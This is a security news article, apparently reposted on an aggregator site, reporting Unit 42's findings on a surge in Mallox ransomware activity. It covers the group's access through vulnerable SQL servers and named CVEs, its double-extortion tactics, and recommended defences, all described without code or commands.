Mallox Ransomware Group Activity Shifts Into High Gear

Malicious activity targeting vulnerable SQL servers has surged 174% compared to 2022, Palo Altos Unit 42 says.

A ransomware actor with a penchant for breaking into target networks via vulnerable SQL servers has suddenly become very active over the past several months and appears poised to become an even bigger threat than it is already.
The group, tracked as Mallox — aka TargetCompany, Fargo, and Tohnichi — first surfaced in June 2021 and claims to have infected hundreds of organizations worldwide since then. The groups victims include organizations in the manufacturing, retail, wholesale, legal, and professional services sectors.
Starting earlier this year, threat activity related to the group has surged, particularly in May, according to researchers at Palo Alto Networks Unit 42 threat intelligence team. Palo Altos telemetry, and that from other open threat intelligence sources, show a startling
174% increase in Mallox-related activity
so far this year, compared to 2022, the security vendor said in a blog this week.
Previously, Mallox was known for being a relatively small and closed ransomware group, says Lior Rochberger, senior security researcher at Palo Alto Networks, attributes the explosive activity to concerted efforts by group leaders to grow Mallox operations.
In the beginning of 2023, it appears that the group started putting more efforts into expanding its operations by recruiting affiliates, she says. This can potentially explain the surge we observed during this year, and especially more recently, around May.
The Mallox groups typical approach for gaining initial access on enterprise networks is to target vulnerable and otherwise insecure SQL servers. Often they start with a brute-force attack where the adversary uses a list of commonly used passwords or known default passwords against an organizations SQL servers.
Researchers have observed Mallox exploiting at least two remote code execution vulnerabilities in SQL —
CVE-2020-0618
and
CVE-2019-1068
, Rochberger says.
So far, Unit 42 has only observed Mallox infiltrating networks via SQL servers. But other researchers have reported recent attempts to distribute Mallox via phishing emails, suggesting that new affiliate groups are involved now as well, Rochberger says.
After gaining access, the attackers use the command line and PowerShell to download the Mallox ransomware payload from a remote server, Unit 42s report this week noted.
As with many other ransomware infections these days, the payload first attempts to disable all services that would impede its ability to encrypt data on a victim system. It also tries to systematically delete shadow copies, so data restoration becomes harder once encryption is complete. In addition, the malware tries to clear all event logs using a common Microsoft command utility as part of an effort to complicate forensics analysis.
Mallox is a double extortion campaign, meaning the threat actors steal data from a victim environment before encrypting it. The group — like almost every other ransomware operation these days — maintains a website where it leaks data belonging to victims who refuse to accede to its ransom demands. Victim organizations can negotiate with Mallox operators via a Tor website using a unique private key to authenticate themselves. Mallox operators themselves claim to have breached hundreds of organizations worldwide. Unit 42 said its own telemetry indicates at least dozens of potential victims worldwide.
Malloxs sudden burst of activity, while noteworthy, is
unlikely to change anything for enterprise defenders
or cause
any new additional problems
for them. A new report from the NCC Group this week showed a
221% increase in ransomware attacks
this year over the same period in 2022. NCC Group said it counted a record 434 attacks in June 2023, most of them tied to the Cl0p ransomware groups exploitation of the MOVEit file transfer vulnerability. The Cl0p group in total accounted for 90 ransomware attacks that NCC observed in June. Lockbit 3.0 was another very active threat actor over the period, NCC Group said.
As always, the best defense against the threat is to have a multilayered plan in place for addressing such attacks. The Unit 42 team recommends making sure that all Internet-facing applications are configured properly, and all systems are patched and up to date wherever possible, the security vendor advised. Its also a good idea to have endpoint security controls in place for performing in-memory inspection to detect process-injection attempts, lateral movement efforts, and attempts to evade security controls, the vendor said.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Mallox Ransomware Group Activity Shifts Into High Gear